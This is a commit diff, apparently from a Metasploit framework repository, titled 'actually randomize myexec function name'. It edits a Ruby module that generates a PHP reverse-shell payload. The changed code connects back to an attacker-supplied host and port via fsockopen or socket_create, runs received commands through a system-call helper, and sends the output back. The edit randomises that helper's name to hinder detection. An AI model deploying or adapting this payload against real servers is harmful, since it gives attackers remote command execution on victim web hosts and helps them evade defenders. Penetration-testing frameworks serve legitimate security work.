actually randomize myexec function name
git-svn-id: file:///home/svn/framework3/trunk@5744 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
770ed0286c
commit
38b565399e
|
@ -62,15 +62,15 @@ module Metasploit3
|
||||||
ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
|
ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
|
||||||
port = datastore['LPORT']
|
port = datastore['LPORT']
|
||||||
end
|
end
|
||||||
exec_funcname = Rex::Text.rand_text_alpha(5)
|
exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
|
||||||
|
|
||||||
shell=<<-END_OF_PHP_CODE
|
shell=<<-END_OF_PHP_CODE
|
||||||
$ipaddr=long2ip(#{ipaddr});
|
$ipaddr=long2ip(#{ipaddr});
|
||||||
$port=#{port};
|
$port=#{port};
|
||||||
#{php_preamble({:disabled_varname => "$dis"})}
|
#{php_preamble({:disabled_varname => "$dis"})}
|
||||||
|
|
||||||
if(!function_exists('myexec')){
|
if(!function_exists('#{exec_funcname}')){
|
||||||
function myexec($c){
|
function #{exec_funcname}($c){
|
||||||
global$dis;
|
global$dis;
|
||||||
#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
|
#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
|
||||||
return$o;
|
return$o;
|
||||||
|
@ -80,7 +80,7 @@ module Metasploit3
|
||||||
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
|
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
|
||||||
$s=@fsockopen($ipaddr,$port);
|
$s=@fsockopen($ipaddr,$port);
|
||||||
while($c=fread($s,2048)){
|
while($c=fread($s,2048)){
|
||||||
$out=myexec(substr($c,0,-1));
|
$out=#{exec_funcname}(substr($c,0,-1));
|
||||||
if($out===false){
|
if($out===false){
|
||||||
fwrite($s,$nofuncs);
|
fwrite($s,$nofuncs);
|
||||||
break;
|
break;
|
||||||
|
@ -93,7 +93,7 @@ module Metasploit3
|
||||||
@socket_connect($s,$ipaddr,$port);
|
@socket_connect($s,$ipaddr,$port);
|
||||||
@socket_write($s,"socket_create");
|
@socket_write($s,"socket_create");
|
||||||
while($c=@socket_read($s,2048)){
|
while($c=@socket_read($s,2048)){
|
||||||
$out=myexec(substr($c,0,-1));
|
$out=#{exec_funcname}(substr($c,0,-1));
|
||||||
if($out===false){
|
if($out===false){
|
||||||
@socket_write($s,$nofuncs);
|
@socket_write($s,$nofuncs);
|
||||||
break;
|
break;
|
||||||
|
|
Loading…
Reference in New Issue